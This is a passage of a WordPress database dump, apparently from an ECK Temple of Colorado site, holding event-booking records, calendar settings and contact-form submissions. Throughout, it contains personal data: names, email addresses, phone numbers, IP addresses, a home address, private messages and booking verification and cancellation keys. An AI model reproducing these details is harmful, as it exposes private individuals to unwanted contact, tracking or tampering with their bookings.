s','a:0:{}'),(187459,268765,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187460,268765,'mec_tickets','a:0:{}'),(187461,268765,'mec_fees_global_inheritance','1'),(187462,268765,'mec_fees','a:0:{}'),(187463,268765,'mec_ticket_variations_global_inheritance','1'),(187464,268765,'mec_ticket_variations','a:0:{}'),(187465,268765,'mec_reg_fields_global_inheritance','1'),(187466,268765,'mec_reg_fields','a:0:{}'),(187467,268765,'mec_bfixed_fields','a:0:{}'),(187468,268765,'mec_op','a:0:{}'),(187469,268765,'mec_fields','a:0:{}'),(187470,268765,'mec_event_status','EventScheduled'),(187471,268765,'mec_moved_online_link',''),(187472,268765,'mec_cancelled_reason',''),(187473,268765,'mec_display_cancellation_reason_in_single_page',''),(187474,268765,'boldgrid_hide_page_title','0'),(187475,268765,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187476,268765,'passster_activate_global_protection',NULL),(187477,268765,'passster_activate_protection',NULL),(187478,268765,'passster_protection_type','password'),(187479,268765,'boldgrid_in_page_containers','1'),(187480,268765,'passster_area_shortcode',''),(187481,268765,'_wp_old_date','2023-01-14'),(187482,268765,'mec_cost_auto_calculate','0'),(187483,268765,'mec_style_per_event','global'),(187484,268765,'mec_trailer_url',''),(187485,268765,'mec_trailer_title',''),(187486,268765,'mec_start_datetime','2023-07-11 07:00 PM'),(187487,268765,'mec_end_datetime','2023-07-11 08:00 PM'),(187488,268765,'mec_sequence','4'),(187489,268765,'mec_event_gallery','a:0:{}'),(187490,268765,'mec_related_events','a:0:{}'),(187491,268765,'mec_banner','a:0:{}'),(187494,268765,'_dp_original','268759'),(187493,268765,'_thumbnail_id','268766'),(187495,268765,'_edit_lock','1688228709:15'),(187496,268766,'_wp_attached_file','2023/07/Flower2.webp'),(187497,268766,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:20:\"2023/07/Flower2.webp\";s:8:\"filesize\";i:9920;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Flower2-350x196.webp\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4106;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Flower2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2232;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"Flower2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4484;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:20:\"Flower2-500x337.webp\";s:5:\"width\";i:500;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7100;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"Flower2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6334;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"Flower2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5010;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"Flower2-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(187498,268765,'_edit_last','15'),(187499,268767,'_field_55','Helaine'),(187500,268767,'_field_56','Reiner'),(187501,268767,'_field_57','helainer@comcast.net'),(187502,268767,'_field_58','(141) 546-4745'),(187503,268767,'_field_59','Boulder'),(187504,268767,'_field_62','ESA/Initiator-Roy Ludwick'),(187505,268767,'_field_63','Hi Roy,\nI am looking to have an ESA session. I have not done this in years. But now seems to be a good time - lots of transitions. \n\nIn ECK,\nHelaine'),(187506,268767,'_form_id','6'),(187507,268767,'_seq_num','6'),(187508,268768,'mec_transaction_id','EQL46700'),(187509,268768,'mec_gateway','MEC_gateway_free'),(187510,268768,'mec_gateway_label','Free'),(187511,268768,'mec_user_id','1000089'),(187512,268768,'mec_verified','1'),(187513,268768,'mec_verification_key','1eead40be35b2cf2220c8ab51b082715'),(187514,268768,'mec_cancellation_key','484157c79f34c3450c677f20d8136f39'),(187515,268768,'mec_confirmed','1'),(187516,268768,'mec_event_id','268685'),(187517,268768,'mec_date','1688293800:1688297400'),(187518,268768,'mec_ticket_id',',1,'),(187519,268768,'mec_booking_time','2023-07-02 09:59:31'),(187520,268768,'mec_all_dates','a:0:{}'),(187521,268768,'mec_other_dates','a:0:{}'),(187522,268768,'mec_attention_time','1688293800:1688297400'),(187523,268768,'mec_attention_time_start','1688293800'),(187524,268768,'mec_attention_time_end','1688297400'),(187525,268768,'mec_book_date_submit','20230702095931'),(187526,268768,'mec_booking_location','118'),(187527,268768,'mec_ticket_price_1','0'),(187528,268768,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"bluehuuron@yahoo.com\";s:4:\"name\";s:9:\"Jack Lile\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"75.166.7.134\";}}'),(187529,268768,'mec_price','0'),(187530,268768,'mec_payable','0'),(187531,268768,'mec_local_timezone','America/Denver'),(187532,268769,'mec_transaction_id','PNM51328'),(187533,268769,'mec_gateway','MEC_gateway_free'),(187534,268769,'mec_gateway_label','Free'),(187535,268769,'mec_user_id','1000090'),(187536,268769,'mec_verified','1'),(187537,268769,'mec_verification_key','2cd578fe241144721ae4ded81e7283b4'),(187538,268769,'mec_cancellation_key','2a59b73d8041f6d08cb544b36f658cb6'),(187539,268769,'mec_confirmed','1'),(187540,268769,'mec_event_id','268685'),(187541,268769,'mec_date','1688293800:1688297400'),(187542,268769,'mec_ticket_id',',1,'),(187543,268769,'mec_booking_time','2023-07-02 10:28:51'),(187544,268769,'mec_all_dates','a:0:{}'),(187545,268769,'mec_other_dates','a:0:{}'),(187546,268769,'mec_attention_time','1688293800:1688297400'),(187547,268769,'mec_attention_time_start','1688293800'),(187548,268769,'mec_attention_time_end','1688297400'),(187549,268769,'mec_book_date_submit','20230702102851'),(187550,268769,'mec_booking_location','118'),(187551,268769,'mec_ticket_price_1','0'),(187552,268769,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:15:\"dkolter@gmx.net\";s:4:\"name\";s:4:\"Dirk\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"89.247.166.104\";}}'),(187553,268769,'mec_price','0'),(187554,268769,'mec_payable','0'),(187555,268769,'mec_local_timezone','Europe/Berlin'),(189417,268871,'mec_end_time_ampm','PM'),(189416,268871,'mec_end_time_minutes','30'),(189404,268871,'protect_children',''),(187559,268770,'_edit_lock','1688528831:2'),(187560,268770,'_edit_last','2'),(187561,268770,'_wp_page_template','default'),(187562,268770,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(187563,268770,'boldgrid_hide_page_title','0'),(187564,268770,'protect_children',''),(187565,268770,'boldgrid_in_page_containers','1'),(187566,268770,'bgseo_robots_index','index'),(187567,268770,'bgseo_robots_follow','follow'),(187568,268770,'passster_area_shortcode',''),(187569,268772,'_field_377','tEST'),(187570,268772,'_field_378','TESTING'),(187571,268772,'_field_379','CHOLL.03@COMCAST.NET'),(187572,268772,'_field_380','(555) 555-5555'),(187573,268772,'_field_381','Denver'),(187574,268772,'_field_384','ECK Temple Vahana Leader'),(187575,268772,'_field_385','tHIS IS A TEST'),(187576,268772,'_form_id','41'),(187577,268772,'_seq_num','7'),(187578,268776,'_field_660','Test1'),(187579,268776,'_field_661','testing'),(187580,268776,'_field_662','chris4hu@outlook.com'),(187581,268776,'_field_663','(555) 555-5555'),(187582,268776,'_field_664','Boulder'),(187583,268776,'_field_665','ESA/Initiator-Gardiner Tucker'),(187584,268776,'_field_666','This is a test!!!'),(187585,268776,'_form_id','62'),(187586,268776,'_seq_num','1'),(187587,268777,'_field_660','JOE'),(187588,268777,'_field_661','SMITH'),(187589,268777,'_field_662','chris4hu@outlook.com'),(187590,268777,'_field_663','(555) 555-5555'),(187591,268777,'_field_664','Northwest'),(187592,268777,'_field_665','ESA/Initiator-Gardiner Tucker'),(187593,268777,'_field_666','THIS IS A TEST -- #2'),(187594,268777,'_form_id','62'),(187595,268777,'_seq_num','2'),(187596,268778,'_field_660','Joe1'),(187597,268778,'_field_661','Smith'),(187598,268778,'_field_662','chris4hu@outlook.com'),(187599,268778,'_field_663','(555) 555-5555'),(187600,268778,'_field_664','Loveland'),(187601,268778,'_field_665','esa-initiator-barry-frost'),(187602,268778,'_field_666','Testing'),(187603,268778,'_form_id','62'),(187604,268778,'_seq_num','3'),(187605,268779,'_field_660','Joe3'),(187606,268779,'_field_661','Smith'),(187607,268779,'_field_662','choll.03@comcast.net'),(187608,268779,'_field_663','(555) 555-5555'),(187609,268779,'_field_664','Loveland'),(187610,268779,'_field_665','Initiator-Marcie Tucker'),(187611,268779,'_field_666','Testing'),(187612,268779,'_form_id','62'),(187613,268779,'_seq_num','4'),(187614,268780,'_field_660','Brad 1'),(187615,268780,'_field_661','Smith'),(187616,268780,'_field_662','chris4hu@outlook.com'),(187617,268780,'_field_663','(555) 555-5555'),(187618,268780,'_field_664','Co Springs'),(187619,268780,'_field_665','ESAInitiator-Barry Frost'),(187620,268780,'_field_666','Testing'),(187621,268780,'_form_id','62'),(187622,268780,'_seq_num','5'),(187623,268781,'_field_133','Leslie'),(187624,268781,'_field_134','Cohen'),(187625,268781,'_field_135','leslie@thekeypeople.net'),(187626,268781,'_field_137','Quote for cleaning'),(187627,268781,'_field_138','Are you interested in a straightforward cleaning quote that meets the specific needs of your company? The Key People has been in business for 50 years and we have dedicated clients that have been with us for 15+.\n\nLet me know if you\'d like some information about our services or references in your area. I\'d be available to provide a no-obligation cleaning estimate based on your cleaning expectations and specifications.\n\nAll the best,\n\nWe wish you a Happy Independence Day\n\nLeslie Cohen\nCustomer Service Manager\nThe Key People\nleslie@thekeypeople.net\n\nRespond with stop to optout.'),(187628,268781,'_form_id','13'),(187629,268781,'_seq_num','138'),(187630,268782,'mec_transaction_id','JEC45603'),(187631,268782,'mec_gateway','MEC_gateway_free'),(187632,268782,'mec_gateway_label','Free'),(187633,268782,'mec_user_id','1000077'),(187634,268782,'mec_verified','1'),(187635,268782,'mec_verification_key','2224acef58952b28e9254f3c45352f69'),(187636,268782,'mec_cancellation_key','a81269afc1fc7754caf4784317d67643'),(187637,268782,'mec_confirmed','1'),(187638,268782,'mec_event_id','268679'),(187639,268782,'mec_date','1688898600:1688902200'),(187640,268782,'mec_ticket_id',',1,'),(187641,268782,'mec_booking_time','2023-07-08 04:05:02'),(187642,268782,'mec_all_dates','a:0:{}'),(187643,268782,'mec_other_dates','a:0:{}'),(187644,268782,'mec_attention_time','1688898600:1688902200'),(187645,268782,'mec_attention_time_start','1688898600'),(187646,268782,'mec_attention_time_end','1688902200'),(187647,268782,'mec_book_date_submit','20230708040502'),(187648,268782,'mec_booking_location','129'),(187649,268782,'mec_ticket_price_1','0'),(187650,268782,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:27:\"Gerald and Johanna van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"108.180.206.226\";}}'),(187651,268782,'mec_price','0'),(187652,268782,'mec_payable','0'),(187653,268782,'mec_local_timezone','America/Vancouver'),(187654,268783,'mec_transaction_id','CEB36442'),(187655,268783,'mec_gateway','MEC_gateway_free'),(187656,268783,'mec_gateway_label','Free'),(187657,268783,'mec_user_id','1000047'),(187658,268783,'mec_verified','1'),(187659,268783,'mec_verification_key','b0a83360a1cd1e5b9c6ec54f31a4c088'),(187660,268783,'mec_cancellation_key','a7deb092420e60a6d073bcb9dfea8dcf'),(187661,268783,'mec_confirmed','1'),(187662,268783,'mec_event_id','268679'),(187663,268783,'mec_date','1688898600:1688902200'),(187664,268783,'mec_ticket_id',',1,'),(187665,268783,'mec_booking_time','2023-07-08 19:28:17'),(187666,268783,'mec_all_dates','a:0:{}'),(187667,268783,'mec_other_dates','a:0:{}'),(187668,268783,'mec_attention_time','1688898600:1688902200'),(187669,268783,'mec_attention_time_start','1688898600'),(187670,268783,'mec_attention_time_end','1688902200'),(187671,268783,'mec_book_date_submit','20230708192817'),(187672,268783,'mec_booking_location','129'),(187673,268783,'mec_ticket_price_1','0'),(187674,268783,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:4:\"Beth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"71.205.44.29\";}}'),(187675,268783,'mec_price','0'),(187676,268783,'mec_payable','0'),(187677,268783,'mec_local_timezone','America/Denver'),(187678,268784,'mec_transaction_id','QKT59940'),(187679,268784,'mec_gateway','MEC_gateway_free'),(187680,268784,'mec_gateway_label','Free'),(187681,268784,'mec_user_id','1000024'),(187682,268784,'mec_verified','1'),(187683,268784,'mec_verification_key','4e0abe6eb093608f0d087ad852dd849e'),(187684,268784,'mec_cancellation_key','d94d821c96835535088fbec7bbf975fa'),(187685,268784,'mec_confirmed','1'),(187686,268784,'mec_event_id','268679'),(187687,268784,'mec_date','1688898600:1688902200'),(187688,268784,'mec_ticket_id',',1,'),(187689,268784,'mec_booking_time','2023-07-08 21:40:48'),(187690,268784,'mec_all_dates','a:0:{}'),(187691,268784,'mec_other_dates','a:0:{}'),(187692,268784,'mec_attention_time','1688898600:1688902200'),(187693,268784,'mec_attention_time_start','1688898600'),(187694,268784,'mec_attention_time_end','1688902200'),(187695,268784,'mec_book_date_submit','20230708214048'),(187696,268784,'mec_booking_location','129'),(187697,268784,'mec_ticket_price_1','0'),(187698,268784,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.98.136.116\";}}'),(187699,268784,'mec_price','0'),(187700,268784,'mec_payable','0'),(187701,268784,'mec_local_timezone','America/Denver'),(187702,268785,'mec_transaction_id','VFQ21754'),(187703,268785,'mec_gateway','MEC_gateway_free'),(187704,268785,'mec_gateway_label','Free'),(187705,268785,'mec_user_id','1000076'),(187706,268785,'mec_verified','1'),(187707,268785,'mec_verification_key','c59eeba7ec68487a1faa5f39c3de4b13'),(187708,268785,'mec_cancellation_key','208ec8fc0fd1e50d6cfabbd7f7ad3573'),(187709,268785,'mec_confirmed','1'),(187710,268785,'mec_event_id','268679'),(187711,268785,'mec_date','1688898600:1688902200'),(187712,268785,'mec_ticket_id',',1,'),(187713,268785,'mec_booking_time','2023-07-08 22:17:43'),(187714,268785,'mec_all_dates','a:0:{}'),(187715,268785,'mec_other_dates','a:0:{}'),(187716,268785,'mec_attention_time','1688898600:1688902200'),(187717,268785,'mec_attention_time_start','1688898600'),(187718,268785,'mec_attention_time_end','1688902200'),(187719,268785,'mec_book_date_submit','20230708221743'),(187720,268785,'mec_booking_location','129'),(187721,268785,'mec_ticket_price_1','0'),(187722,268785,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:31:\"shannon.everett2018@outlook.com\";s:4:\"name\";s:15:\"Shannon Everett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"98.245.88.180\";}}'),(187723,268785,'mec_price','0'),(187724,268785,'mec_payable','0'),(187725,268785,'mec_local_timezone','America/Denver'),(187726,268786,'mec_transaction_id','HBY28530'),(187727,268786,'mec_gateway','MEC_gateway_free'),(187728,268786,'mec_gateway_label','Free'),(187729,268786,'mec_user_id','1000023'),(187730,268786,'mec_verified','1'),(187731,268786,'mec_verification_key','e4e905715797bd2f19458a5a3b82456f'),(187732,268786,'mec_cancellation_key','021a2900b5b488e85b206e63c2043f75'),(187733,268786,'mec_confirmed','1'),(187734,268786,'mec_event_id','268679'),(187735,268786,'mec_date','1688898600:1688902200'),(187736,268786,'mec_ticket_id',',1,'),(187737,268786,'mec_booking_time','2023-07-09 06:48:33'),(187738,268786,'mec_all_dates','a:0:{}'),(187739,268786,'mec_other_dates','a:0:{}'),(187740,268786,'mec_attention_time','1688898600:1688902200'),(187741,268786,'mec_attention_time_start','1688898600'),(187742,268786,'mec_attention_time_end','1688902200'),(187743,268786,'mec_book_date_submit','20230709064833'),(187744,268786,'mec_booking_location','129'),(187745,268786,'mec_ticket_price_1','0'),(187746,268786,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"172.58.13.18\";}}'),(187747,268786,'mec_price','0'),(187748,268786,'mec_payable','0'),(187749,268786,'mec_local_timezone','America/Denver'),(187750,268787,'mec_transaction_id','RNE29696'),(187751,268787,'mec_gateway','MEC_gateway_free'),(187752,268787,'mec_gateway_label','Free'),(187753,268787,'mec_user_id','1000022'),(187754,268787,'mec_verified','1'),(187755,268787,'mec_verification_key','be2b109c574ed8201a460856a0d669a0'),(187756,268787,'mec_cancellation_key','c3a9eddca3a8e4e04f80e640de82d623'),(187757,268787,'mec_confirmed','1'),(187758,268787,'mec_event_id','268679'),(187759,268787,'mec_date','1688898600:1688902200'),(187760,268787,'mec_ticket_id',',1,'),(187761,268787,'mec_booking_time','2023-07-09 09:35:09'),(187762,268787,'mec_all_dates','a:0:{}'),(187763,268787,'mec_other_dates','a:0:{}'),(187764,268787,'mec_attention_time','1688898600:1688902200'),(187765,268787,'mec_attention_time_start','1688898600'),(187766,268787,'mec_attention_time_end','1688902200'),(187767,268787,'mec_book_date_submit','20230709093509'),(187768,268787,'mec_booking_location','129'),(187769,268787,'mec_ticket_price_1','0'),(187770,268787,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:6:\"Jorge \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.96.123\";}}'),(187771,268787,'mec_price','0'),(187772,268787,'mec_payable','0'),(187773,268787,'mec_local_timezone','America/Denver'),(187774,268788,'mec_transaction_id','OJP49096'),(187775,268788,'mec_gateway','MEC_gateway_free'),(187776,268788,'mec_gateway_label','Free'),(187777,268788,'mec_user_id','1000061'),(187778,268788,'mec_verified','1'),(187779,268788,'mec_verification_key','6c97d2fbc686c6232966f7ca1ac577ae'),(187780,268788,'mec_cancellation_key','d55837d615a8cc5cc423cf2b036ea09a'),(187781,268788,'mec_confirmed','1'),(187782,268788,'mec_event_id','268679'),(187783,268788,'mec_date','1688898600:1688902200'),(187784,268788,'mec_ticket_id',',1,'),(187785,268788,'mec_booking_time','2023-07-09 09:49:18'),(187786,268788,'mec_all_dates','a:0:{}'),(187787,268788,'mec_other_dates','a:0:{}'),(187788,268788,'mec_attention_time','1688898600:1688902200'),(187789,268788,'mec_attention_time_start','1688898600'),(187790,268788,'mec_attention_time_end','1688902200'),(187791,268788,'mec_book_date_submit','20230709094918'),(187792,268788,'mec_booking_location','129'),(187793,268788,'mec_ticket_price_1','0'),(187794,268788,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:17:\"Chukwuebuka Okwor\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"24.8.224.150\";}}'),(187795,268788,'mec_price','0'),(187796,268788,'mec_payable','0'),(187797,268788,'mec_local_timezone','America/Denver'),(187798,268789,'mec_transaction_id','ZAH87590'),(187799,268789,'mec_gateway','MEC_gateway_free'),(187800,268789,'mec_gateway_label','Free'),(187801,268789,'mec_user_id','1000024'),(187802,268789,'mec_verified','1'),(187803,268789,'mec_verification_key','07833c0b2fbaad20917caad31b21903a'),(187804,268789,'mec_cancellation_key','b17f7bc04de3cd08148cf6488fd28e8a'),(187805,268789,'mec_confirmed','1'),(187806,268789,'mec_event_id','268679'),(187807,268789,'mec_date','1688898600:1688902200'),(187808,268789,'mec_ticket_id',',1,'),(187809,268789,'mec_booking_time','2023-07-09 10:18:28'),(187810,268789,'mec_all_dates','a:0:{}'),(187811,268789,'mec_other_dates','a:0:{}'),(187812,268789,'mec_attention_time','1688898600:1688902200'),(187813,268789,'mec_attention_time_start','1688898600'),(187814,268789,'mec_attention_time_end','1688902200'),(187815,268789,'mec_book_date_submit','20230709101828'),(187816,268789,'mec_booking_location','129'),(187817,268789,'mec_ticket_price_1','0'),(187818,268789,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:14:\"Roger  Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"174.162.175.166\";}}'),(187819,268789,'mec_price','0'),(187820,268789,'mec_payable','0'),(187821,268789,'mec_local_timezone','America/Denver'),(187823,268789,'_edit_lock','1689025252:2'),(187824,268792,'_field_496','Agnes'),(187825,268792,'_field_497','Hynes'),(187826,268792,'_field_498','(303) 434-2448'),(187827,268792,'_field_499','amhynes7@msn.com'),(187828,268792,'_field_500','496 W Caley Cir'),(187829,268792,'_field_501','Littleton'),(187830,268792,'_field_502','CO'),(187831,268792,'_field_503','US'),(187832,268792,'_field_505','Hello Mike Mont-Eton.  This is a 2nd request.\nI am no longer receiving the ECK Temple of Colorado newsletter. I somehow got kicked off of the list.  Hopefully I will see the August email sent to my email address: amhynes7@msn.com.\n\nThank you.\nIn the Eck\nAgnes Hynes\n'),(187833,268792,'_form_id','53'),(187834,268792,'_seq_num','13'),(187835,268793,'_field_496','Jim'),(187836,268793,'_field_497','wyss'),(187837,268793,'_field_498','(303) 819-7509'),(187838,268793,'_field_499','jwyss4@comcast.net'),(187839,268793,'_field_500','841 stubbs la'),(187840,268793,'_field_501','bozeman'),(187841,268793,'_field_502','MT'),(187842,268793,'_field_503','US'),(187843,268793,'_field_505','I would like to get on your email list.\nThank you,\nJim'),(187844,268793,'_form_id','53'),(187845,268793,'_seq_num','14'),(189936,268893,'_field_97','Test'),(187849,268794,'protect_children',''),(187850,268794,'mec_color',''),(187851,268794,'mec_location_id','118'),(187852,268794,'mec_dont_show_map','0'),(187853,268794,'mec_organizer_id','1'),(187854,268794,'mec_read_more',''),(187855,268794,'mec_more_info',''),(187856,268794,'mec_more_info_title',''),(187857,268794,'mec_more_info_target','_self'),(187858,268794,'mec_cost',''),(187859,268794,'mec_currency','a:0:{}'),(187860,268794,'mec_additional_organizer_ids','a:0:{}'),(187861,268794,'mec_additional_location_ids','a:0:{}'),(187862,268794,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-16\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-16\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187863,268794,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187864,268794,'mec_certain_weekdays','a:0:{}'),(187865,268794,'mec_allday','0'),(187866,268794,'one_occurrence','0'),(187867,268794,'mec_hide_time','0'),(187868,268794,'mec_hide_end_time','0'),(187869,268794,'mec_comment',''),(187870,268794,'mec_timezone','global'),(187871,268794,'mec_countdown_method','global'),(187872,268794,'mec_public','1'),(187873,268794,'mec_start_date','2023-09-16'),(187874,268794,'mec_start_time_hour','1'),(187875,268794,'mec_start_time_minutes','0'),(187876,268794,'mec_start_time_ampm','PM'),(187877,268794,'mec_start_day_seconds','46800'),(187878,268794,'mec_end_date','2023-09-16'),(187879,268794,'mec_end_time_hour','2'),(187880,268794,'mec_end_time_minutes','0'),(187881,268794,'mec_end_time_ampm','PM'),(187882,268794,'mec_end_day_seconds','50400'),(187883,268794,'mec_repeat_status','0'),(187884,268794,'mec_repeat_type',''),(187885,268794,'mec_repeat_interval','1'),(187886,268794,'mec_repeat_end',''),(187887,268794,'mec_repeat_end_at_occurrences',''),(187888,268794,'mec_repeat_end_at_date',''),(187889,268794,'mec_advanced_days','a:0:{}'),(187890,268794,'mec_in_days',''),(187891,268794,'mec_not_in_days',''),(187892,268794,'mec_hourly_schedules','a:0:{}'),(187893,268794,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited